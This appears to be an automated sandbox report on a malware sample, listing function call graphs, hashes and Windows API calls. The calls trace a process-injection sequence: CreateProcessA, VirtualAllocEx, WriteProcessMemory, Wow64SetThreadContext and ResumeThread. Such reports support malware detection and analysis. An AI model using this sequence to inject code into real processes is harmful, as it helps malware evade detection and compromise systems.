10560->10630 10561->10496 10564 1c2258 10563->10564 10566 26f980 ResumeThread 10564->10566 10567 26f978 ResumeThread 10564->10567 10565 1c23f1 10566->10565 10567->10565 10569 1c2019 10568->10569 10570 1c02c8 ReadProcessMemory 10569->10570 10570->10569 10572 1c1f57 10571->10572 10574 1c0168 WriteProcessMemory 10572->10574 10575 1c0161 WriteProcessMemory 10572->10575 10573 1c266b 10574->10573 10575->10573 10577 1c1c9b 10576->10577 10578 1c1e1b 10577->10578 10579 1c04f4 CreateProcessA 10577->10579 10580 1c0500 CreateProcessA 10577->10580 10578->10496 10579->10578 10580->10578 10582 1c2744 10581->10582 10583 1c202a 10582->10583 10585 1c02c8 ReadProcessMemory 10582->10585 10584 1c02c8 ReadProcessMemory 10583->10584 10584->10583 10585->10583 10587 26fef1 Wow64SetThreadContext 10586->10587 10589 26ff6f 10587->10589 10589->10513 10591 26fef1 Wow64SetThreadContext 10590->10591 10593 26ff6f 10591->10593 10593->10513 10595 1c0587 CreateProcessA 10594->10595 10597 1c07e5 10595->10597 10599 1c0587 CreateProcessA 10598->10599 10601 1c07e5 10599->10601 10603 1c01b4 WriteProcessMemory 10602->10603 10605 1c0253 10603->10605 10605->10523 10607 1c01b4 WriteProcessMemory 10606->10607 10609 1c0253 10607->10609 10609->10523 10611 26f9c4 ResumeThread 10610->10611 10613 26fa16 10611->10613 10613->10528 10615 26f97d ResumeThread 10614->10615 10617 26fa16 10615->10617 10617->10528 10619 1c2a15 10618->10619 10626 1c0040 10619->10626 10623 1c2a15 10622->10623 10625 1c0040 VirtualAllocEx 10623->10625 10624 1c2a34 10624->10548 10625->10624 10627 1c0084 VirtualAllocEx 10626->10627 10629 1c0102 10627->10629 10629->10548 10631 1c0314 ReadProcessMemory 10630->10631 10633 1c0392 10631->10633 10633->10560

                      Executed Functions

                      Function 002605E0 Relevance: 43.2, Strings: 33, Instructions: 1984COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 2605e0-2614f5 call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc call 260ebc call 260ecc call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc 64 2615b1-2618ba call 260edc call 260eec * 2 call 260efc call 260f0c call 260f1c call 260f2c * 5 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c 0->64 65 2614fb-26152b 0->65 71 263443-26345f 64->71 135 2618c0-26194b call 260f8c call 260f9c 64->135 65->71 72 261531-26153f 65->72 72->71 73 261545-26155c 72->73 73->71 75 261562-26159d 73->75 75->71 77 2615a3-2615ab 75->77 77->64 77->65 145 261951-263442 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260ffc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 26100c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 26100c call 26101c call 260f3c call 260f4c call 260f5c call 26102c call 260f6c call 260f7c call 26103c call 260f3c call 260f5c call 26104c call 260f6c call 260f7c call 26105c call 26106c call 26107c call 26108c call 260fac * 8 call 26109c call 2610ac call 2610bc call 260f5c call 2610cc call 2610dc call 2610ec call 2610fc call 2610ec call 2610fc call 2610ec * 2 call 2610fc call 2610ec call 2610fc 135->145
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$Ppp$g$g$k$k$u$u$u$u
                      • API String ID: 0-4064997190
                      • Opcode ID: 2c615f5d9b5d5762a1b4a472ceab911ee81f75e3ccab40274bf050c6662c7895
                      • Instruction ID: 2a2a6b26b475e230072c97b39945885c25527d143c2be7ddbed3a634736f67c1
                      • Opcode Fuzzy Hash: 2c615f5d9b5d5762a1b4a472ceab911ee81f75e3ccab40274bf050c6662c7895
                      • Instruction Fuzzy Hash: 17231A30910715CFC725EF74C894B9AB7B2BF89300F508A99E4496B261EF75AAC5CF81
                      Function 002612C9 Relevance: 43.2, Strings: 33, Instructions: 1973COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 500 2612c9-2614f5 call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc call 260ebc call 260ecc call 26080c call 26081c * 2 call 26080c call 260ebc call 260ecc 562 2615b1 500->562 563 2614fb-26152b 500->563 564 2615bb-2615bf call 260edc 562->564 569 263443-26345f 563->569 570 261531-26153f 563->570 567 2615c4-26160b call 260eec * 2 564->567 585 261615-261619 call 260efc 567->585 570->569 571 261545-26155c 570->571 571->569 573 261562-26159d 571->573 573->569 575 2615a3-2615ab 573->575 575->562 575->563 587 26161e-261629 585->587 589 261633-261637 call 260f0c 587->589 591 26163c-26189c call 260f1c call 260f2c * 5 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c 589->591 630 2618a1-2618b0 591->630 632 2618b6-2618ba 630->632 632->569 633 2618c0-261926 call 260f8c call 260f9c 632->633 642 261930-26194b 633->642 643 261951-263442 call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260fac * 5 call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fac call 260f3c call 260f4c call 260f5c call 260fbc call 260f6c call 260f7c call 260fcc call 260fdc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260ffc call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 26100c call 260f3c call 260f4c call 260f5c call 260f6c call 260f7c call 260fec call 26100c call 26101c call 260f3c call 260f4c call 260f5c call 26102c call 260f6c call 260f7c call 26103c call 260f3c call 260f5c call 26104c call 260f6c call 260f7c call 26105c call 26106c call 26107c call 26108c call 260fac * 8 call 26109c call 2610ac call 2610bc call 260f5c call 2610cc call 2610dc call 2610ec call 2610fc call 2610ec call 2610fc call 2610ec * 2 call 2610fc call 2610ec call 2610fc 642->643
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$Ppp$g$g$k$k$u$u$u$u
                      • API String ID: 0-4064997190
                      • Opcode ID: 51ffc13ccb4bfda8632de17c8e4f419bd6cd4593fca335ae5da53539d86d774f
                      • Instruction ID: 99522a37e565e80389fbf93d04935dd071ec3095b17738584726094b37bbe24c
                      • Opcode Fuzzy Hash: 51ffc13ccb4bfda8632de17c8e4f419bd6cd4593fca335ae5da53539d86d774f
                      • Instruction Fuzzy Hash: EF231A30910715CFC725EF74C894B9AB7B2BF89300F518A99E4496B261EF71AAC5CF81
                      Function 001C1C58 Relevance: .2, Instructions: 198COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b231d53405fc83612c0a7b6ac1136a959e08bcdccdf038692457a94e839a78c
                      • Instruction ID: e6838f736a032b3bc0a1a8805572a5e0dc5e0084ec57b42b8d397b5a344bd1b6
                      • Opcode Fuzzy Hash: 3b231d53405fc83612c0a7b6ac1136a959e08bcdccdf038692457a94e839a78c
                      • Instruction Fuzzy Hash: 21814A71D45219DFDB28CF66CC40BE9BBB6BF9A300F10D1AAC409A7251EB704A85DF40
                      Function 001C04F4 Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1149 1c04f4-1c0599 1151 1c059b-1c05b2 1149->1151 1152 1c05e2-1c060a 1149->1152 1151->1152 1157 1c05b4-1c05b9 1151->1157 1155 1c060c-1c0620 1152->1155 1156 1c0650-1c06a6 1152->1156 1155->1156 1167 1c0622-1c0627 1155->1167 1165 1c06ec-1c07e3 CreateProcessA 1156->1165 1166 1c06a8-1c06bc 1156->1166 1158 1c05dc-1c05df 1157->1158 1159 1c05bb-1c05c5 1157->1159 1158->1152 1162 1c05c9-1c05d8 1159->1162 1163 1c05c7 1159->1163 1162->1162 1164 1c05da 1162->1164 1163->1162 1164->1158 1185 1c07ec-1c08d1 1165->1185 1186 1c07e5-1c07eb 1165->1186 1166->1165 1174 1c06be-1c06c3 1166->1174 1168 1c0629-1c0633 1167->1168 1169 1c064a-1c064d 1167->1169 1171 1c0635 1168->1171 1172 1c0637-1c0646 1168->1172 1169->1156 1171->1172 1172->1172 1175 1c0648 1172->1175 1176 1c06c5-1c06cf 1174->1176 1177 1c06e6-1c06e9 1174->1177 1175->1169 1179 1c06d1 1176->1179 1180 1c06d3-1c06e2 1176->1180 1177->1165 1179->1180 1180->1180 1182 1c06e4 1180->1182 1182->1177 1198 1c08e1-1c08e5 1185->1198 1199 1c08d3-1c08d7 1185->1199 1186->1185 1200 1c08f5-1c08f9 1198->1200 1201 1c08e7-1c08eb 1198->1201 1199->1198 1202 1c08d9 1199->1202 1204 1c0909-1c090d 1200->1204 1205 1c08fb-1c08ff 1200->1205 1201->1200 1203 1c08ed 1201->1203 1202->1198 1203->1200 1207 1c090f-1c0938 1204->1207 1208 1c0943-1c094e 1204->1208 1205->1204 1206 1c0901 1205->1206 1206->1204 1207->1208 1211 1c094f 1208->1211 1211->1211
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C07C7
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 32cab24dd05fd1c841a5deb3322599031f91c8c022f7ec9d282b58446d1af6ed
                      • Instruction ID: 17dcc16ac7fee2c73d15ae0175ee7644dae039c6c2bced44599934abd65067cd
                      • Opcode Fuzzy Hash: 32cab24dd05fd1c841a5deb3322599031f91c8c022f7ec9d282b58446d1af6ed
                      • Instruction Fuzzy Hash: A4C11470D00229CFDF25CFA8C845BEEBBB1BB59304F0091AAD859B7250DB749A85CF95
                      Function 001C0500 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1213 1c0500-1c0599 1215 1c059b-1c05b2 1213->1215 1216 1c05e2-1c060a 1213->1216 1215->1216 1221 1c05b4-1c05b9 1215->1221 1219 1c060c-1c0620 1216->1219 1220 1c0650-1c06a6 1216->1220 1219->1220 1231 1c0622-1c0627 1219->1231 1229 1c06ec-1c07e3 CreateProcessA 1220->1229 1230 1c06a8-1c06bc 1220->1230 1222 1c05dc-1c05df 1221->1222 1223 1c05bb-1c05c5 1221->1223 1222->1216 1226 1c05c9-1c05d8 1223->1226 1227 1c05c7 1223->1227 1226->1226 1228 1c05da 1226->1228 1227->1226 1228->1222 1249 1c07ec-1c08d1 1229->1249 1250 1c07e5-1c07eb 1229->1250 1230->1229 1238 1c06be-1c06c3 1230->1238 1232 1c0629-1c0633 1231->1232 1233 1c064a-1c064d 1231->1233 1235 1c0635 1232->1235 1236 1c0637-1c0646 1232->1236 1233->1220 1235->1236 1236->1236 1239 1c0648 1236->1239 1240 1c06c5-1c06cf 1238->1240 1241 1c06e6-1c06e9 1238->1241 1239->1233 1243 1c06d1 1240->1243 1244 1c06d3-1c06e2 1240->1244 1241->1229 1243->1244 1244->1244 1246 1c06e4 1244->1246 1246->1241 1262 1c08e1-1c08e5 1249->1262 1263 1c08d3-1c08d7 1249->1263 1250->1249 1264 1c08f5-1c08f9 1262->1264 1265 1c08e7-1c08eb 1262->1265 1263->1262 1266 1c08d9 1263->1266 1268 1c0909-1c090d 1264->1268 1269 1c08fb-1c08ff 1264->1269 1265->1264 1267 1c08ed 1265->1267 1266->1262 1267->1264 1271 1c090f-1c0938 1268->1271 1272 1c0943-1c094e 1268->1272 1269->1268 1270 1c0901 1269->1270 1270->1268 1271->1272 1275 1c094f 1272->1275 1275->1275
                      APIs
                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C07C7
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: c8dbf6ffe13bbdc0dacd612bbd2db95b25bd076917136edcce2c2f35d84c1ef3
                      • Instruction ID: 35c4d5b7c9ccd7b6bdb34a2e8d3eaeea234548fd3365a0f79d1014ea97f67d8c
                      • Opcode Fuzzy Hash: c8dbf6ffe13bbdc0dacd612bbd2db95b25bd076917136edcce2c2f35d84c1ef3
                      • Instruction Fuzzy Hash: 4BC11370D00229CFDF25CFA8C845BEEBBB1BB59304F0091AAD859B7250DB749A85CF95
                      Function 001C0161 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1277 1c0161-1c01d3 1279 1c01ea-1c0251 WriteProcessMemory 1277->1279 1280 1c01d5-1c01e7 1277->1280 1282 1c025a-1c02ac 1279->1282 1283 1c0253-1c0259 1279->1283 1280->1279 1283->1282
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C023B
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 722d9a38417bd55498a7281ff92069f68c74673477581d162a75692a9599536d
                      • Instruction ID: 90c55dff357a995acdfe47b3c8a2b95acf45cea53721087f22aea55c2bc9df96
                      • Opcode Fuzzy Hash: 722d9a38417bd55498a7281ff92069f68c74673477581d162a75692a9599536d
                      • Instruction Fuzzy Hash: C641B9B4D002489FCF00CFA9D984AEEFBF1BB49314F24902AE815B7210D374AA45CF64
                      Function 001C0168 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1288 1c0168-1c01d3 1290 1c01ea-1c0251 WriteProcessMemory 1288->1290 1291 1c01d5-1c01e7 1288->1291 1293 1c025a-1c02ac 1290->1293 1294 1c0253-1c0259 1290->1294 1291->1290 1294->1293
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C023B
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 94049cba4c606da5408133a8e604b5c3acdf938b770655c00d1b4e6ac34880ee
                      • Instruction ID: aa486f201061d2590966999898e466adafa2bda616706b72236340e7518de87c
                      • Opcode Fuzzy Hash: 94049cba4c606da5408133a8e604b5c3acdf938b770655c00d1b4e6ac34880ee
                      • Instruction Fuzzy Hash: 1D41A8B4D002489FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D774AA45CF64
                      Function 001C02C8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1299 1c02c8-1c0390 ReadProcessMemory 1302 1c0399-1c03eb 1299->1302 1303 1c0392-1c0398 1299->1303 1303->1302
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C037A
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 3fe4b22dcffe02a0be885190d970154e81aef55cb5b5065d615e46fa3707ea54
                      • Instruction ID: a04c151eb17faaa2fe44ac1922afef2345c55578f3bb4713e6ef34b030b97042
                      • Opcode Fuzzy Hash: 3fe4b22dcffe02a0be885190d970154e81aef55cb5b5065d615e46fa3707ea54
                      • Instruction Fuzzy Hash: E84199B9D00258DFCF10CFA9D984AEEFBB1BB49314F10A42AE814B7210D775A945CF65
                      Function 001C0040 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1308 1c0040-1c0100 VirtualAllocEx 1311 1c0109-1c0153 1308->1311 1312 1c0102-1c0108 1308->1312 1312->1311
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C00EA
                      Memory Dump Source
                      • Source File: 00000005.00000002.365120465.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1c0000_obie8920193.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: a01961f35b2d7153d566bc7372eb05c44d86ba693e7ede67617e0188f722178c
                      • Instruction ID: 51588ec949cb69af5eb6651e3d1d7d6afa2e048f95e00112098001ea89cc5148
                      • Opcode Fuzzy Hash: a01961f35b2d7153d566bc7372eb05c44d86ba693e7ede67617e0188f722178c
                      • Instruction Fuzzy Hash: 864199B8D002589FCF10CFA9D984AAEFBB1AB49314F10942AE814B7210D775A945CF65
                      Function 0026FEA0 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1317 26fea0-26ff08 1319 26ff1f-26ff6d Wow64SetThreadContext 1317->1319 1320 26ff0a-26ff1c 1317->1320 1322 26ff76-26ffc2 1319->1322 1323 26ff6f-26ff75 1319->1323 1320->1319 1323->1322
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0026FF57
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 0bf2e92cfda671630c93c95e71e350e02c4b03f84fa525d44749e30be47217c7
                      • Instruction ID: d122896ff4f5e1244f73a6e7b2a4a507f65a20d320b210847e33c2362c1527bc
                      • Opcode Fuzzy Hash: 0bf2e92cfda671630c93c95e71e350e02c4b03f84fa525d44749e30be47217c7
                      • Instruction Fuzzy Hash: C341CCB5D002589FCF10CFA9D984AEEFBF1AF49314F24802AE418B7240C778A989CF54
                      Function 0026FEA8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1328 26fea8-26ff08 1330 26ff1f-26ff6d Wow64SetThreadContext 1328->1330 1331 26ff0a-26ff1c 1328->1331 1333 26ff76-26ffc2 1330->1333 1334 26ff6f-26ff75 1330->1334 1331->1330 1334->1333
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0026FF57
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 3665481f2801d3b5d6d46bedfb1d337230e4d75a585f8961a4d10f3bf8152e09
                      • Instruction ID: f4f682b88a4673236428bc602b28f91f3b206cac2fdd48300f9a45463b111a44
                      • Opcode Fuzzy Hash: 3665481f2801d3b5d6d46bedfb1d337230e4d75a585f8961a4d10f3bf8152e09
                      • Instruction Fuzzy Hash: 4E41AEB4D102589FCF10CFA9D984AEEFBB1AF49314F24802AE418B7244D778A985CF54
                      Function 0026F978 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1339 26f978-26fa14 ResumeThread 1343 26fa16-26fa1c 1339->1343 1344 26fa1d-26fa5f 1339->1344 1343->1344
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 0026F9FE
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 649225765207556f227940e6ff008a6c18a384d029324b6f2ab72e6cf5c67c07
                      • Instruction ID: a80fcfd69d489384e03a2ce52d28ea7786817a8daf1c372eb7e366059cea2854
                      • Opcode Fuzzy Hash: 649225765207556f227940e6ff008a6c18a384d029324b6f2ab72e6cf5c67c07
                      • Instruction Fuzzy Hash: 9231CDB4D102589FCF10CFA9E984AEEFBB1AF49314F24942AE819B7300C775A945CF94
                      Function 0026F980 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1349 26f980-26fa14 ResumeThread 1352 26fa16-26fa1c 1349->1352 1353 26fa1d-26fa5f 1349->1353 1352->1353
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 0026F9FE
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 0ca5930d45403d40330c38cacb09b917e5f7ae476f5379f98c638a2ddbcec42d
                      • Instruction ID: 17d3ecef504b8b382b49d34e81444ae042ae126db5f58b6016a643d68fe27b7a
                      • Opcode Fuzzy Hash: 0ca5930d45403d40330c38cacb09b917e5f7ae476f5379f98c638a2ddbcec42d
                      • Instruction Fuzzy Hash: FD31CDB4D102589FCF10CFA9E984AEEFBB5AF49314F14942AE819B7300C775A945CF94
                      Function 0012D1D4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6664dfc41c9e6fca376a9eb9678d0b60404b8d75aa725186d94f7c5a5c9a2f81
                      • Instruction ID: d479a9d812b95eba47cb5b774547ecdfd088709ee232529fe61fa43ef20b8241
                      • Opcode Fuzzy Hash: 6664dfc41c9e6fca376a9eb9678d0b60404b8d75aa725186d94f7c5a5c9a2f81
                      • Instruction Fuzzy Hash: 6F2104B1604240EFDB15CF14F9C0B26BBA5FB84314F34C5ADE8494B246C336D866CB61
                      Function 0012D01C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6142920924f2450e835391fa6948f434b5160f13a3f4a6577285532b28b25ae
                      • Instruction ID: df4b092c05ec048f0677460fb9249acd6b4442e4a14bf5aa15fdfa5b793664ba
                      • Opcode Fuzzy Hash: a6142920924f2450e835391fa6948f434b5160f13a3f4a6577285532b28b25ae
                      • Instruction Fuzzy Hash: C221D075604240EFDB15CF14F884B26BB61EB84314F34C5A9E8494B266C736D857CBA5
                      Function 0012D006 Relevance: .1, Instructions: 63COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4334226fc26c75ff5f4929e58fe71be2c6ef150af434025ed9b75f939bc560c
                      • Instruction ID: 36c00038482e56a82454aa88e7d3d25f0ccc442ad35623984ca1075d80f8db53
                      • Opcode Fuzzy Hash: b4334226fc26c75ff5f4929e58fe71be2c6ef150af434025ed9b75f939bc560c
                      • Instruction Fuzzy Hash: E42130755083809FDB12CF24E994715BF71EF46314F28C5EAD8498F267C33A985ACB62
                      Function 0012D1CF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.364316500.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_12d000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction ID: 72543b5870835b0820fb36b4c2fe8b74d50bb0709eb72f3117824000088e2165
                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction Fuzzy Hash: 76119D75904280DFDB16CF14E5C4B15FFA1FB84314F28C6ADD8494B656C33AD85ACBA2

                      Non-executed Functions

                      Function 0026E370 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.365154139.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_260000_obie8920193.jbxd
                      Similarity
                      • API ID:
                      • String ID: &k
                      • API String ID: 0-4254052200
                      • Opcode ID: 2cfd93cf6d706761e9d1295b2823961a4b8c96baacc9a36f7260f020bb61b70e
                      • Instruction ID: d7ebe0d80d3efd8ea1fa124beab822fb05f1e6528b898deec4861b5470ef551e
                      • Opcode Fuzzy Hash: 2cfd93cf6d706761e9d1295b2823961a4b8c96baacc9a36f7260f020bb61b70e
                      • Instruction Fuzzy Hash: 39E10C78E101598FCB14DFA9D580AADFBB2FF89304F258169D815AB356D730AD82CF60
                      Function 0026EC90 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
